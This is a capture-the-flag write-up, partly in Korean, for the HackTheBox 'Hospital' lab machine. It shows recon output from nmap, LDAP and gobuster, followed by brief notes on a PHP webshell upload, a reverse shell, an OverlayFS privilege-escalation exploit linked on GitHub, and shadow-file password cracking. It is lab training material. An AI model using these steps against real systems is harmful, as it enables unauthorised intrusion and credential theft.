[HTB] Hospital

[htb-zafbonejpv@chaem]-[05:59-16/04]-[/root]
└╼$ nmap -A -T5 10.129.12.225
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-16 06:00 BST
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 06:01 (0:00:14 remaining)
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 06:01 (0:00:14 remaining)
Nmap scan report for 10.129.12.225
Host is up (0.093s latency).
Not shown: 980 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_  256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-04-16 12:00:22Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-16T12:01:12+00:00
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2024-04-15T11:57:03
|_Not valid after:  2024-10-15T11:57:03
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-16T12:01:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.81 seconds

┌[htb-zafbonejpv@chaem]-[06:01-16/04]-[/root]
└╼$ ldapsearch -H ldap://10.129.12.225 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=hospital,DC=htb
namingcontexts: CN=Configuration,DC=hospital,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=hospital,DC=htb
namingcontexts: DC=DomainDnsZones,DC=hospital,DC=htb
namingcontexts: DC=ForestDnsZones,DC=hospital,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1​

admin이라는 계정이 존재하는 것 확인

파일 업로드 기능 존재

PHP 웹쉘 업로드 성공

phpinfo()를 올려서 disable_fuction list를 보면, 안되는 함수를 알 수 있음!

<?php phpinfo(); ?>

파일이 업로드되는 경로를 찾기위해 디렉토리 검색

┌─[root@htb-ergy0nhd5q]─[~/Desktop]
└──╼ #gobuster dir -u http://10.129.12.225:8080 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.12.225:8080
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/04/16 16:57:25 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://10.129.12.225:8080/images/]
/uploads              (Status: 301) [Size: 323] [--> http://10.129.12.225:8080/uploads/]
/css                  (Status: 301) [Size: 319] [--> http://10.129.12.225:8080/css/]    
/js                   (Status: 301) [Size: 318] [--> http://10.129.12.225:8080/js/]     
/vendor               (Status: 301) [Size: 322] [--> http://10.129.12.225:8080/vendor/] 
/fonts                (Status: 301) [Size: 321] [--> http://10.129.12.225:8080/fonts/]  
/server-status        (Status: 403) [Size: 280]                                         
                                                                                        
===============================================================
2024/04/16 16:59:20 Finished
===============================================================​

php 웹쉘이 동작안함...

https://github.com/flozz/p0wny-shell

 

https://www.revshells.com/

Online - Reverse Shell Generator

리버스 쉘 사용

리버스 쉘로 연결 완료

웹서버 버전에 해당하는 오버레이 취약점 활용하여 root 권한 상승

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh

파일에 권한 주고 실행

root가 되어서 shadow 파일 확인. 패스워드 크랙 시도.

패스워드 획득

443포트의 webmail에 로그인하여 메일 확인

 

메일 내용으로 구글링

CVE를 이용하여 exploit 시도

이렇게 만들어진 파일을 메일로 전송

root.txt는 아직 획득 못함

admin 경로 권한 없음